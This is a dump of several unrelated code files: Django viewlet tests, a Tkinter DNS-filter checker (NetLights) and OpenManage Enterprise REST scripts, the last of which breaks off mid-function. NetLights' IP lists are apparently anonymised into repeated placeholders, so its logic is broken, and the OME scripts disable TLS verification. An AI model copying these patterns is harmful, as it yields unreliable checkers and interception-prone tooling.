#### File: viewlet/tests/test_viewlet.py
```python
import importlib
import logging
from time import sleep, time
import django
import django.conf
from django.template import TemplateSyntaxError, engines
from django.test import Client, TestCase, override_settings
from django.urls import reverse
from .. import (
cache as cache_m,
call,
conf,
exceptions,
get,
get_version,
library,
models,
refresh,
viewlet,
)
from ..cache import get_cache, make_key_args_join
from ..conf import settings
from ..exceptions import UnknownViewlet
from ..loaders import jinja2_loader
cache = get_cache()
__all__ = ["ViewletTest", "ViewletCacheBackendTest", "ViewletKeyTest"]
class ViewletTest(TestCase):
def setUp(self):
cache.clear()
@viewlet
def hello_world(context):
return "Hello wörld!"
@viewlet
def hello_name(context, name="wurld"):
return "Hello %s" % name
@viewlet(template="hello_world.html", timeout=0)
def hello_nocache(context, name="wurld"):
return {"name": name}
@viewlet(template="hello_world.html", timeout=10)
def hello_cache(context, name):
return {
"name": name,
"timestamp": time(),
}
@viewlet(name="hello_new_name", template="hello_world.html", timeout=10)
def hello_named_world(context, name):
return {
"name": name,
}
@viewlet(template="hello_timestamp.html", timeout=10)
def hello_cached_timestamp(context, name):
return {
"name": name,
"timestamp": time(),
}
self.hello_cached_timestamp = hello_cached_timestamp
@viewlet(template="hello_timestamp.html", timeout=None)
def hello_infinite_cache(context, name):
return {
"name": name,
"timestamp": time(),
}
@viewlet(template="hello_timestamp.html", timeout=0)
def hello_non_cached_timestamp(context, name):
return {
"name": name,
"timestamp": time(),
}
@viewlet(template="hello_strong_world.html", timeout=10)
def hello_strong(context, name):
return {"name": name}
@viewlet(template="hello_request.html", timeout=0)
def hello_request(context, greeting):
return {"greeting": greeting}
@viewlet(template="hello_from_dir.html", timeout=0)
def hello_from_dir(context, greeting):
return {"greeting": greeting}
@viewlet(timeout=0)
def hello_render_to_string(context):
from django.template.loader import render_to_string
context["greeting"] = "Hello"
return render_to_string("hello_request.html", context)
self.tail = "\n"
def tearDown(self):
jinja2_loader._env = None
settings.VIEWLET_JINJA2_ENVIRONMENT = "viewlet.loaders.jinja2_loader.create_env"
def get_django_template(self, source):
return "\n".join(("{% load viewlets %}", source))
def get_jinja_template(self, source):
with override_settings(TEMPLATES=django.conf.settings.JINJA2_TEMPLATES):
from django.template import engines
return engines["jinja2"].from_string(source)
def render(self, source, context=None, request=None):
kwargs = {"context": context or {}, "request": request}
return engines["django"].from_string(source).render(**kwargs).strip()
def test_version(self):
self.assertEqual(get_version((1, 2, 3, "alpha", 1)), "1.2.3a1")
self.assertEqual(get_version((1, 2, 3, "beta", 2)), "1.2.3b2")
self.assertEqual(get_version((1, 2, 3, "rc", 3)), "1.2.3c3")
self.assertEqual(get_version((1, 2, 3, "final", 4)), "1.2.3")
def test_get_existing_viewlet(self):
get("hello_cache")
def test_get_non_existing_viewlet(self):
self.assertRaises(UnknownViewlet, get, "i_do_not_exist")
def test_empty_decorator(self):
template = self.get_django_template("<h1>{% viewlet hello_world %}</h1>")
html1 = self.render(template)
self.assertEqual(html1, "<h1>Hello wörld!</h1>")
sleep(0.01)
html2 = self.render(template)
self.assertEqual(html1, html2)
def test_render_tag(self):
template = self.get_django_template(
"<h1>{% viewlet hello_nocache name=viewlet_arg %}</h1>"
)
html = self.render(template, {"viewlet_arg": "wörld"})
self.assertEqual(html.strip(), "<h1>Hello wörld!\n</h1>")
template = self.get_django_template("<h1>{% viewlet unknown_viewlet %}</h1>")
logging.disable(logging.ERROR)
self.assertRaises(UnknownViewlet, self.render, template)
logging.disable(logging.NOTSET)
template = self.get_django_template("<h1>{% viewlet hello_world name= %}</h1>")
self.assertRaises(TemplateSyntaxError, self.render, template)
def test_cached_tag(self):
template = self.get_django_template(
"<h1>{% viewlet hello_cached_timestamp 'world' %}</h1>"
)
html1 = self.render(template)
sleep(0.01)
html2 = self.render(template)
self.assertEqual(html1, html2)
def test_non_cached_tag(self):
template = self.get_django_template(
"<h1>{% viewlet hello_non_cached_timestamp 'world' %}</h1>"
)
html1 = self.render(template)
sleep(0.01)
html2 = self.render(template)
self.assertNotEqual(html1, html2)
def test_cache(self):
html1 = call("hello_cache", None, "world")
sleep(0.01)
html2 = call("hello_cache", None, "world")
self.assertEqual(html1, html2)
def test_unicode_cache(self):
html1 = call("hello_cache", None, "wörld")
sleep(0.01)
html2 = call("hello_cache", None, "wörld")
self.assertEqual(html1, html2)
def test_refresh(self):
template = self.get_django_template(
"<h1>{% viewlet hello_cached_timestamp 'world' %}</h1>"
)
html1 = self.render(template)
sleep(0.01)
refresh("hello_cached_timestamp", "world")
html2 = self.render(template)
self.assertNotEqual(html1, html2)
sleep(0.01)
self.hello_cached_timestamp.refresh("world")
html3 = self.render(template)
self.assertNotEqual(html3, html2)
sleep(0.01)
html4 = self.render(template)
self.assertEqual(html3, html4)
self.hello_cached_timestamp.expire("world")
html5 = self.render(template)
self.assertNotEqual(html5, html4)
def test_view(self):
client = Client()
url = reverse("viewlet", args=["hello_cache"])
response = client.get(url, {"name": "wörld"})
self.assertEqual(response.status_code, 200)
html = call("hello_cache", None, "wörld")
self.assertEqual(response.content.decode("utf-8"), html)
def test_view_request(self):
client = Client()
url = reverse("viewlet", args=["hello_request"])
response = client.get(url, {"greeting": "wörld"})
self.assertEqual(response.status_code, 200)
self.assertContains(response, "wörld AnonymousUser!")
def test_jinja_tag(self):
template = self.get_jinja_template(
"<h1>{% viewlet 'hello_nocache', viewlet_arg %}</h1>"
)
html = template.render({"extra": "Räksmörgås", "viewlet_arg": "wörld"})
self.assertEqual(html.strip(), "<h1>RäksmörgåsHello wörld!%s</h1>" % self.tail)
def test_context_tag(self):
template = self.get_django_template(
"<h1>{% viewlet hello_cached_timestamp 'world' %}</h1>"
)
self.render(template)
v = get("hello_cached_timestamp")
cache_key = v._build_cache_key("world")
viewlet_data = cache.get(cache_key)
self.assertTrue("name" in viewlet_data)
self.assertEqual(viewlet_data["name"], "world")
self.assertTrue(isinstance(viewlet_data, dict))
def test_infinite_cache(self):
template = self.get_django_template(
"<h1>{% viewlet hello_infinite_cache 'world' %}</h1>"
)
self.render(template)
v = get("hello_infinite_cache")
self.assertEqual(v.timeout, settings.VIEWLET_INFINITE_CACHE_TIMEOUT)
def test_expire_cache(self):
v = get("hello_cache")
v.call({}, "world")
cache_key = v._build_cache_key("world")
self.assertTrue(cache.get(cache_key) is not None)
v.expire("world")
self.assertTrue(cache.get(cache_key) is None)
def test_mark_safe(self):
# Test django
template = self.get_django_template(
"<h1>{% viewlet hello_strong 'wörld' %}</h1>"
)
html = self.render(template.strip())
self.assertEqual(html, "<h1>Hello <strong>wörld!</strong>\n</h1>")
# Test jinja2
template = self.get_jinja_template(
"<h1>{% viewlet 'hello_strong', 'wörld' %}</h1>"
)
html = template.render()
self.assertEqual(html, "<h1>Hello <strong>wörld!</strong>%s</h1>" % self.tail)
def test_cached_string(self):
template = self.get_django_template(
"<h1>{% viewlet hello_name name='wörld' %}</h1>"
)
html = self.render(template)
self.assertTrue(isinstance(html, str))
v = get("hello_name")
cache_key = v._build_cache_key("wörld")
cached_value = cache.get(cache_key)
self.assertTrue(isinstance(cached_value, bytes))
def test_named(self):
template = self.get_django_template(
"<h1>{% viewlet hello_new_name 'wörld' %}</h1>"
)
self.render(template)
self.assertTrue(get("hello_new_name") is not None)
def test_refreshing_context_viewlet_expecting_request_while_rendering_using_jinja2(
self,
):
template = self.get_jinja_template(
"{% viewlet 'hello_request', 'nice to see you' %}"
)
html = template.render({"request": {"user": "<NAME>"}})
refresh("hello_request", "nice to see you")
self.assertNotEqual(template.render({"request": {"user": "<NAME>"}}), html)
def test_django_template_from_dir(self):
template = self.get_django_template(
"{% viewlet hello_from_dir 'nice to see you' %}"
)
req = {"user": "<NAME>"}
html = self.render(template, context={"request": req}, request=req)
self.assertTrue(isinstance(html, str))
self.assertEqual(html, "nice to see you <NAME>!")
def test_jinja_template_from_dir(self):
template = self.get_jinja_template(
"{% viewlet 'hello_from_dir', 'nice to see you' %}"
)
html = template.render({"request": {"user": "<NAME>"}})
self.assertTrue(isinstance(html, str))
self.assertEqual(html, "nice to see you nicolas cage!\n")
def test_request_context(self):
template = self.get_django_template(
"""
<h1>{% viewlet hello_render_to_string %}</h1>
{% viewlet hello_render_to_string %}
{% viewlet hello_render_to_string %}
{% viewlet hello_render_to_string %}
{% viewlet hello_render_to_string %}
"""
)
context = {"test": "test"}
html = self.render(template, context=context, request="Request")
self.assertTrue(isinstance(html, str))
class ViewletCacheBackendTest(TestCase):
@override_settings(VIEWLET_DEFAULT_CACHE_ALIAS="dummy")
@override_settings(
CACHES={
"default": {"BACKEND": "django.core.cache.backends.locmem.LocMemCache"},
"short": {"BACKEND": "viewlet.tests.utils.ShortLocMemCache"},
"dummy": {"BACKEND": "django.core.cache.backends.dummy.DummyCache"},
}
)
def setUp(self):
self.assertNotEqual("dummy", conf.settings.VIEWLET_DEFAULT_CACHE_ALIAS)
for m in [
conf,
cache_m,
library,
models,
]: # conf must be reloaded first; do NOT move to a function
importlib.reload(m)
self.assertEqual("dummy", conf.settings.VIEWLET_DEFAULT_CACHE_ALIAS)
@viewlet(template="hello_timestamp.html", timeout=10)
def hello_cached_timestamp_settings_cache(context, name):
return {
"name": name,
"timestamp": time(),
}
@viewlet(template="hello_timestamp.html", using="short")
def hello_cached_timestamp_argument_cache(context, name):
return {
"name": name,
"timestamp": time(),
}
def tearDown(self):
del django.conf.settings.VIEWLET_DEFAULT_CACHE_ALIAS
for m in [
conf,
cache_m,
library,
models,
]: # conf must be reloaded first; do NOT move to a function
importlib.reload(m)
self.assertNotEqual("dummy", conf.settings.VIEWLET_DEFAULT_CACHE_ALIAS)
def test_cache_backend_from_settings(self):
v = get("hello_cached_timestamp_settings_cache")
v.call({}, "world")
cache_key = v._build_cache_key("world")
self.assertIsNone(v._cache_get(cache_key))
def test_cache_backend_from_argument(self):
v = get("hello_cached_timestamp_argument_cache")
v.call({}, "world")
cache_key = v._build_cache_key("world")
self.assertIsNotNone(v._cache_get(cache_key))
sleep(v.cache.default_timeout + 0.01)
self.assertIsNone(v._cache_get(cache_key))
class ViewletKeyTest(TestCase):
def setUp(self):
@viewlet(timeout=1, key="somekey")
def custom_key_without_args(context):
return "hello"
@viewlet(timeout=1, key="somekey")
def custom_key_missing_args(context, greet, name):
return f"{greet} {name}!"
@viewlet(timeout=1, key="somekey:{args}")
def custom_key_with_args(context, greet, name):
return f"{greet} {name}!"
@viewlet(timeout=1, key="somekey(%s,%s)")
def custom_key_old_format(context, greet, name):
return f"{greet} {name}!"
def test_custom_key_without_args(self):
v = get("custom_key_without_args")
self.assertEqual(v._build_cache_key(), "somekey")
def test_custom_key_missing_args(self):
v = get("custom_key_missing_args")
args = ("Hello", "world")
self.assertRaises(exceptions.WrongKeyFormat, v._build_cache_key, *args)
def test_custom_key_with_args(self):
v = get("custom_key_with_args")
args = ("Hello", "world")
v.call({}, *args)
cache_key = v._build_cache_key(*args)
self.assertTrue(v._build_cache_key().startswith("somekey:"))
self.assertEqual(v._cache_get(cache_key), "%s %s!" % args)
def test_custom_key_old_format(self):
v = get("custom_key_old_format")
args = ("Hello", "world")
self.assertRaises(exceptions.DeprecatedKeyFormat, v._build_cache_key, *args)
def test_key_args_join(self):
self.key_func = "viewlet.cache.make_key_args_join"
django.conf.settings.VIEWLET_CACHE_KEY_FUNCTION = self.key_func
self.assertNotEqual(self.key_func, conf.settings.VIEWLET_CACHE_KEY_FUNCTION)
for m in [
conf,
cache_m,
library,
models,
]: # conf must be reloaded first; do NOT move to a function
importlib.reload(m)
self.assertEqual(self.key_func, conf.settings.VIEWLET_CACHE_KEY_FUNCTION)
@viewlet(timeout=10)
def name_args_join(context, greet, name):
return f"{greet} {name}!"
v = get("name_args_join")
args = ("Hello", "world")
v.call({}, *args)
cache_key = v._build_cache_key(*args)
self.assertEqual(cache_key, make_key_args_join(v, args))
self.assertEqual(v._cache_get(cache_key), "%s %s!" % args)
del django.conf.settings.VIEWLET_CACHE_KEY_FUNCTION
for m in [
conf,
cache_m,
library,
models,
]: # conf must be reloaded first; do NOT move to a function
importlib.reload(m)
self.assertNotEqual(self.key_func, conf.settings.VIEWLET_CACHE_KEY_FUNCTION)
``` |
{
"source": "5N6R/NetLights",
"score": 3
} |
#### File: 5N6R/NetLights/NetLights.py
```python
import dns.resolver
import dns.rdtypes
import os, sys, re
from tkinter import *
ip=["192.168.127.12","172.16.58.3","172.16.31.10", "192.168.127.12","192.168.127.12",
"172.16.58.3","172.16.58.3","172.16.31.10"]
red=yellow=green=black=0
rez=[red,yellow,green,black]
def mous(event):
try:
cb=app.clipboard_get()
ii.set(cb)
except:
cl()
def cl() :
app.clipboard_clear()
ii.set("")
fr0.configure(bg="silver")
url=""
red=yellow=green=black=0
rez[0]=rez[1]=rez[2]=rez[3]=0
def checker(event):
rez[0]=rez[1]=rez[2]=rez[3]=0
url=ii.get()
if url!= "":
xx=url.split("//")
if len(xx)==1:
url=xx[0]
else:
url=xx[1]
for x in range(0,8,2):
resolver = dns.resolver.Resolver(configure=False)
resolver.nameservers = [ip[x],ip[x+1]]
try:
dr=resolver.query(url)[0].to_text()
if (dr=="172.16.58.3" or dr=="192.168.127.12" or dr=="172.16.17.32" or dr=="172.16.17.32"
or dr=="192.168.127.12" or dr=="192.168.127.12"):
rez[1]=rez[1]+1
elif (dr=="172.16.17.32" or dr=="172.16.58.3" or dr=="192.168.3.11" or dr== "192.168.127.12"
or dr=="172.16.31.10" or dr=="172.16.31.10" or dr=="172.16.58.3" or dr=="192.168.3.11"
or dr=="192.168.127.12" or dr=="192.168.127.12"):
rez[0]=rez[0]+1
else:
rez[2]=rez[2]+1
except:
rez[3]=rez[3]+1
if rez[0]>0:
rezz="red"
elif rez[1] >0:
rezz="yellow"
elif rez[2] >0:
rezz="green"
else:
rezz="black"
fr0.configure(bg=rezz)
app=Tk()
app.title(chr(9816)*7+" NetLights version 0.5 beta "+chr(169)+" 2017, programming by 5n6r "+chr(9816)*7)
app.geometry("700x60")
app.resizable(0,0)
ii=StringVar()
ii.set("")
fr0=Frame(app,bd=2,height=12,relief="groove",bg="silver")
fr0.pack(padx=10,pady=10)
e=Entry(fr0,textvariable=ii,bd=1,cursor="spider",width=30)
e.focus()
e.grid(row=0,column=0,pady=5,padx=5)
b1=Button(fr0,text="Check!",cursor="hand2")
b1.grid(row=0,column=1,padx=3,pady=3)
b2=Button(fr0,text="New check",command=cl,cursor="hand2")
b2.grid(row=0,column=2,padx=3,pady=3)
b2=Button(fr0,text="Exit program",command=app.destroy,cursor="hand2")
b2.grid(row=0,column=3,padx=3,pady=3)
e.bind("<Button-3>",mous)
e.bind("<Return>",checker)
b1.bind("<Button-1>",checker)
app.mainloop()
``` |
{
"source": "5nafu/OpenManage-Enterprise",
"score": 2
} |
#### File: Core/Python/get_audit_logs.py
```python
import argparse
import csv
import json
import sys
from argparse import RawTextHelpFormatter
from pprint import pprint
from urllib.parse import urlparse
try:
import urllib3
import requests
import smbclient
except ModuleNotFoundError:
print("This program requires urllib3, requests, smbprotocol, and gssapi. To install them on most systems run "
"`pip install requests urllib3 smbprotocol[kerberos]`")
sys.exit(0)
try:
from gssapi.raw import inquire_sec_context_by_oid
except ImportError as error:
print("-----WARNING-----")
print("python-gssapi extension is not available. You need to install it with `pip install gssapi`: %s" % str(error))
print("You will also need a Kerberos installation. See https://pypi.org/project/smbprotocol/ for details.")
print("You can ignore this if you do not plan on using Kerberos for authentication.")
print("-----------------")
except OSError as error:
print("Encountered an OS error. This usually means you are missing kerberos dependencies. The error was:",
str(error))
sys.exit(0)
def authenticate(ome_ip_address: str, ome_username: str, ome_password: str) -> dict:
"""
Authenticates with OME and creates a session
Args:
ome_ip_address: IP address of the OME server
ome_username: Username for OME
ome_password: OME password
Returns: A dictionary of HTTP headers
Raises:
Exception: A generic exception in the event of a failure to connect.
"""
authenticated_headers = {'content-type': 'application/json'}
session_url = 'https://%s/api/SessionService/Sessions' % ome_ip_address
user_details = {'UserName': ome_username,
                    'Password': ome_password,
'SessionType': 'API'}
session_info = requests.post(session_url, verify=False,
data=json.dumps(user_details),
headers=authenticated_headers)
if session_info.status_code == 201:
authenticated_headers['X-Auth-Token'] = session_info.headers['X-Auth-Token']
return authenticated_headers
print("There was a problem authenticating with OME. Are you sure you have the right username, password, "
"and IP?")
raise Exception("There was a problem authenticating with OME. Are you sure you have the right username, "
"password, and IP?")
def get_data(authenticated_headers: dict, url: str, odata_filter: str = None, max_pages: int = None) -> list:
"""
This function retrieves data from a specified URL. Get requests from OME return paginated data. The code below
handles pagination. This is the equivalent in the UI of a list of results that require you to go to different
pages to get a complete listing.
Args:
authenticated_headers: A dictionary of HTTP headers generated from an authenticated session with OME
url: The API url against which you would like to make a request
odata_filter: An optional parameter for providing an odata filter to run against the API endpoint.
max_pages: The maximum number of pages you would like to return
Returns: Returns a list of dictionaries of the data received from OME
"""
next_link_url = None
if odata_filter:
count_data = requests.get(url + '?$filter=' + odata_filter, headers=authenticated_headers, verify=False)
if count_data.status_code == 400:
print("Received an error while retrieving data from %s:" % url + '?$filter=' + odata_filter)
pprint(count_data.json()['error'])
return []
count_data = count_data.json()
if count_data['@odata.count'] <= 0:
print("No results found!")
return []
else:
count_data = requests.get(url, headers=authenticated_headers, verify=False).json()
if 'value' in count_data:
data = count_data['value']
else:
data = count_data
if '@odata.nextLink' in count_data:
# Grab the base URI
next_link_url = '{uri.scheme}://{uri.netloc}'.format(uri=urlparse(url)) + count_data['@odata.nextLink']
i = 1
while next_link_url is not None:
# Break if we have reached the maximum number of pages to be returned
if max_pages:
if i >= max_pages:
break
else:
i = i + 1
response = requests.get(next_link_url, headers=authenticated_headers, verify=False)
next_link_url = None
if response.status_code == 200:
requested_data = response.json()
if requested_data['@odata.count'] <= 0:
print("No results found!")
return []
# The @odata.nextLink key is only present in data if there are additional pages. We check for it and if it
# is present we get a link to the page with the next set of results.
if '@odata.nextLink' in requested_data:
next_link_url = '{uri.scheme}://{uri.netloc}'.format(uri=urlparse(url)) + \
requested_data['@odata.nextLink']
if 'value' in requested_data:
data += requested_data['value']
else:
data += requested_data
else:
print("Unknown error occurred. Received HTTP response code: " + str(response.status_code) +
" with error: " + response.text)
raise Exception("Unknown error occurred. Received HTTP response code: " + str(response.status_code)
+ " with error: " + response.text)
return data
if __name__ == '__main__':
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
parser = argparse.ArgumentParser(description=__doc__, formatter_class=RawTextHelpFormatter)
parser.add_argument("--ip", "-i", required=True, help="OME Appliance IP")
parser.add_argument("--user", "-u", required=False, help="Username for the OME Appliance", default="admin")
parser.add_argument("--password", "-p", required=True, help="Password for the OME Appliance")
parser.add_argument("--share", "-s", required=False,
help="A path to the share which you want to in format "
"\\\\<ip_address>\\<share_name>\\<file_name>")
parser.add_argument("--smbuser", "-su", required=False, help="The username for SMB")
parser.add_argument("--smbpass", "-sp", required=False, help="Password for SMB")
args = parser.parse_args()
try:
headers = authenticate(args.ip, args.user, args.password)
if not headers:
sys.exit(0)
audit_logs = get_data(headers, "https://%s/api/ApplicationService/AuditLogs" % args.ip)
if args.share:
if not args.smbuser or not args.smbpass:
print("You must provide the arguments --smbuser and --smbpass when connecting to a share.")
sys.exit(0)
with smbclient.open_file(args.share, username=args.smbuser, password=args.smbpass, mode='w',
encoding='utf-8-sig', newline='') as smbfile:
csv_columns = ["Severity", "Message", "Category", "UserName", "IpAddress", "MessageArgs", "MessageID",
"CreatedDate"]
writer = csv.DictWriter(smbfile, fieldnames=csv_columns, extrasaction='ignore')
writer.writeheader()
for row in audit_logs:
writer.writerow(row)
else:
pprint(audit_logs)
except Exception as error:
print("Unexpected error:", str(error))
```
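The two helpers above can also be driven programmatically instead of through argparse. A hedged sketch with a placeholder appliance address and credentials (the field names printed come from the CSV columns used above):
```python
# Placeholder IP/credentials; assumes the authenticate() and get_data() helpers above.
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
headers = authenticate('192.168.0.120', 'admin', 'changeme')
logs = get_data(headers, 'https://192.168.0.120/api/ApplicationService/AuditLogs', max_pages=2)
for entry in logs:
    print(entry.get('CreatedDate'), entry.get('Severity'), entry.get('Message'))
```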
#### File: Core/Python/get_group_details_by_filter.py
```python
import argparse
import json
from argparse import RawTextHelpFormatter
import requests
import urllib3
def get_group_details(ip_address, user_name, password, filter_by, field):
""" Get Group Details using OData filters """
try:
base_uri = 'https://%s' % ip_address
sess_url = base_uri + '/api/SessionService/Sessions'
base_grp = base_uri + "/api/GroupService/Groups"
grp_url = base_grp + "?$filter=%s eq '%s'" % (filter_by, field)
next_link_url = None
headers = {'content-type': 'application/json'}
user_details = {'UserName': user_name,
'Password': password,
'SessionType': 'API'}
sess_info = requests.post(sess_url, verify=False,
data=json.dumps(user_details),
headers=headers)
if sess_info.status_code == 201:
headers['X-Auth-Token'] = sess_info.headers['X-Auth-Token']
response = requests.get(grp_url, headers=headers, verify=False)
if response.status_code == 200:
json_data = response.json()
if json_data['@odata.count'] > 0:
print("*** Group Details ***")
print(json.dumps(json_data, indent=4, sort_keys=True))
# Technically there should be only one result in the filter
group_id = json_data['value'][0]['Id']
print("\n*** Group Device Details ***")
dev_url = base_grp + "(" + str(group_id) + ")/Devices"
dev_resp = requests.get(dev_url, headers=headers,
verify=False)
if dev_resp.status_code == 200:
print(json.dumps(dev_resp.json(), indent=4,
sort_keys=True))
device_list = dev_resp.json()
device_count = device_list['@odata.count']
if device_count > 0:
if '@odata.nextLink' in device_list:
next_link_url = base_uri + device_list['@odata.nextLink']
while next_link_url:
next_link_response = requests.get(next_link_url, headers=headers, verify=False)
if next_link_response.status_code == 200:
next_link_json_data = next_link_response.json()
device_list['value'] += next_link_json_data['value']
if '@odata.nextLink' in next_link_json_data:
next_link_url = base_uri + next_link_json_data['@odata.nextLink']
else:
next_link_url = None
else:
print("Unable to get full device list ... ")
next_link_url = None
else:
print("Unable to retrieve devices for group (%s) from %s" % (field, ip_address))
else:
print("No group matching field (%s) retrieved from %s" % (field, ip_address))
else:
print("No group data retrieved from %s" % ip_address)
else:
print("Unable to create a session with appliance %s" % ip_address)
except Exception as error:
print("Unexpected error:", str(error))
if __name__ == '__main__':
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
parser = argparse.ArgumentParser(description=__doc__, formatter_class=RawTextHelpFormatter)
parser.add_argument("--ip", "-i", required=True, help="OME Appliance IP")
parser.add_argument("--user", "-u", required=True,
help="Username for OME Appliance",
default="admin")
parser.add_argument("--password", "-p", required=True,
help="Password for OME Appliance")
parser.add_argument("--filterby", "-fby", required=True,
choices=('Name', 'Description'),
help="filter by group name or description")
parser.add_argument("--field", "-f", required=True,
help="Field to filter by (group name or description)")
args = parser.parse_args()
get_group_details(args.ip, args.user, args.password,
str(args.filterby), str(args.field))
```
#### File: Core/Python/get_group_details.py
```python
import argparse
import json
from argparse import RawTextHelpFormatter
import requests
import urllib3
def get_group_details(ip_address, user_name, password, group_info):
""" List out group details based on id/name/description """
try:
base_uri = 'https://%s' % ip_address
session_url = base_uri + '/api/SessionService/Sessions'
group_url = base_uri + '/api/GroupService/Groups'
next_link_url = None
headers = {'content-type': 'application/json'}
user_details = {'UserName': user_name,
'Password': password,
'SessionType': 'API'}
session_info = requests.post(session_url, verify=False,
data=json.dumps(user_details),
headers=headers)
if session_info.status_code == 201:
headers['X-Auth-Token'] = session_info.headers['X-Auth-Token']
response = requests.get(group_url, headers=headers, verify=False)
if response.status_code == 200:
group_list = response.json()
group_count = group_list['@odata.count']
if group_count > 0:
found_group = False
if '@odata.nextLink' in group_list:
next_link_url = base_uri + group_list['@odata.nextLink']
while next_link_url:
next_link_response = requests.get(next_link_url, headers=headers, verify=False)
if next_link_response.status_code == 200:
next_link_json_data = next_link_response.json()
group_list['value'] += next_link_json_data['value']
if '@odata.nextLink' in next_link_json_data:
next_link_url = base_uri + next_link_json_data['@odata.nextLink']
else:
next_link_url = None
else:
print("Unable to get full group list ... ")
next_link_url = None
for group in group_list['value']:
if ((str(group['Id']).lower() == group_info.lower()) or
str(group['Name']).lower() == group_info.lower() or
str(group['Description']).lower() ==
group_info.lower()):
found_group = True
print("*** Group Details ***")
print(json.dumps(group, indent=4, sort_keys=True))
dev_url = group_url + "(" + str(group['Id']) + ")/Devices"
dev_response = requests.get(dev_url,
headers=headers,
verify=False)
if dev_response.status_code == 200:
device_list = dev_response.json()
device_count = device_list['@odata.count']
if device_count > 0:
if '@odata.nextLink' in device_list:
next_link_url = base_uri + device_list['@odata.nextLink']
while next_link_url:
next_link_response = requests.get(next_link_url, headers=headers, verify=False)
if next_link_response.status_code == 200:
next_link_json_data = next_link_response.json()
device_list['value'] += next_link_json_data['value']
if '@odata.nextLink' in next_link_json_data:
next_link_url = base_uri + next_link_json_data['@odata.nextLink']
else:
next_link_url = None
else:
print("Unable to get full device list ... ")
next_link_url = None
print("\n*** Group Device Details ***")
print(json.dumps(device_list, indent=4,
sort_keys=True))
else:
print("Unable to get devices for (%s)" % group_info)
break
if not found_group:
print("No group matching (%s) found" % group_info)
else:
print("No group data retrieved from %s" % ip_address)
else:
print("Unable to retrieve group list from %s" % ip_address)
else:
print("Unable to create a session with appliance %s" % ip_address)
except Exception as error:
print("Unexpected error:", str(error))
if __name__ == '__main__':
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
parser = argparse.ArgumentParser(description=__doc__, formatter_class=RawTextHelpFormatter)
parser.add_argument("--ip", "-i", required=True, help="OME Appliance IP")
parser.add_argument("--user", "-u", required=True,
help="Username for OME Appliance",
default="admin")
parser.add_argument("--password", "-p", required=True,
help="Password for OME Appliance")
parser.add_argument("--groupinfo", "-g", required=True,
help="Group id/Name/Description - case insensitive")
args = parser.parse_args()
get_group_details(args.ip, args.user, args.password, str(args.groupinfo))
```
#### File: Core/Python/invoke_refresh_inventory.py
```python
import argparse
import json
import sys
import time
from argparse import RawTextHelpFormatter
from pprint import pprint
from typing import List
from urllib.parse import urlparse
try:
import urllib3
import requests
except ModuleNotFoundError:
print("This program requires urllib3 and requests. To install them on most systems run `pip install requests"
"urllib3`")
sys.exit(0)
def authenticate(ome_ip_address: str, ome_username: str, ome_password: str) -> dict:
"""
Authenticates with OME and creates a session
Args:
ome_ip_address: IP address of the OME server
ome_username: Username for OME
ome_password: OME password
Returns: A dictionary of HTTP headers
Raises:
Exception: A generic exception in the event of a failure to connect.
"""
authenticated_headers = {'content-type': 'application/json'}
session_url = 'https://%s/api/SessionService/Sessions' % ome_ip_address
user_details = {'UserName': ome_username,
                    'Password': ome_password,
'SessionType': 'API'}
session_info = requests.post(session_url, verify=False,
data=json.dumps(user_details),
headers=authenticated_headers)
if session_info.status_code == 201:
authenticated_headers['X-Auth-Token'] = session_info.headers['X-Auth-Token']
return authenticated_headers
print("There was a problem authenticating with OME. Are you sure you have the right username, password, "
"and IP?")
raise Exception("There was a problem authenticating with OME. Are you sure you have the right username, "
"password, and IP?")
def get_group_id_by_name(ome_ip_address: str, group_name: str, authenticated_headers: dict) -> int:
"""
Retrieves the ID of a group given its name.
Args:
ome_ip_address: The IP address of the OME server
group_name: The name of the group whose ID you want to resolve.
authenticated_headers: Headers used for authentication to the OME server
Returns: Returns the ID of the group as an integer or -1 if it couldn't be found.
"""
print("Searching for the requested group.")
groups_url = "https://%s/api/GroupService/Groups?$filter=Name eq '%s'" % (ome_ip_address, group_name)
group_response = requests.get(groups_url, headers=authenticated_headers, verify=False)
if group_response.status_code == 200:
json_data = json.loads(group_response.content)
if json_data['@odata.count'] > 1:
print("WARNING: We found more than one name that matched the group name: " + group_name +
". We are picking the first entry.")
        if json_data['@odata.count'] >= 1:
group_id = json_data['value'][0]['Id']
if not isinstance(group_id, int):
print("The server did not return an integer ID. Something went wrong.")
return -1
return group_id
print("Error: We could not find the group " + group_name + ". Exiting.")
return -1
print("Unable to retrieve groups. Exiting.")
return -1
def get_data(authenticated_headers: dict, url: str, odata_filter: str = None, max_pages: int = None) -> list:
"""
This function retrieves data from a specified URL. Get requests from OME return paginated data. The code below
handles pagination. This is the equivalent in the UI of a list of results that require you to go to different
pages to get a complete listing.
Args:
authenticated_headers: A dictionary of HTTP headers generated from an authenticated session with OME
url: The API url against which you would like to make a request
odata_filter: An optional parameter for providing an odata filter to run against the API endpoint.
max_pages: The maximum number of pages you would like to return
Returns: Returns a list of dictionaries of the data received from OME
"""
next_link_url = None
if odata_filter:
count_data = requests.get(url + '?$filter=' + odata_filter, headers=authenticated_headers, verify=False)
if count_data.status_code == 400:
print("Received an error while retrieving data from %s:" % url + '?$filter=' + odata_filter)
pprint(count_data.json()['error'])
return []
count_data = count_data.json()
if count_data['@odata.count'] <= 0:
print("No results found!")
return []
else:
count_data = requests.get(url, headers=authenticated_headers, verify=False).json()
if 'value' in count_data:
data = count_data['value']
else:
data = count_data
if '@odata.nextLink' in count_data:
# Grab the base URI
next_link_url = '{uri.scheme}://{uri.netloc}'.format(uri=urlparse(url)) + count_data['@odata.nextLink']
i = 1
while next_link_url is not None:
# Break if we have reached the maximum number of pages to be returned
if max_pages:
if i >= max_pages:
break
else:
i = i + 1
response = requests.get(next_link_url, headers=authenticated_headers, verify=False)
next_link_url = None
if response.status_code == 200:
requested_data = response.json()
if requested_data['@odata.count'] <= 0:
print("No results found!")
return []
# The @odata.nextLink key is only present in data if there are additional pages. We check for it and if it
# is present we get a link to the page with the next set of results.
if '@odata.nextLink' in requested_data:
next_link_url = '{uri.scheme}://{uri.netloc}'.format(uri=urlparse(url)) + \
requested_data['@odata.nextLink']
if 'value' in requested_data:
data += requested_data['value']
else:
data += requested_data
else:
print("Unknown error occurred. Received HTTP response code: " + str(response.status_code) +
" with error: " + response.text)
raise Exception("Unknown error occurred. Received HTTP response code: " + str(response.status_code)
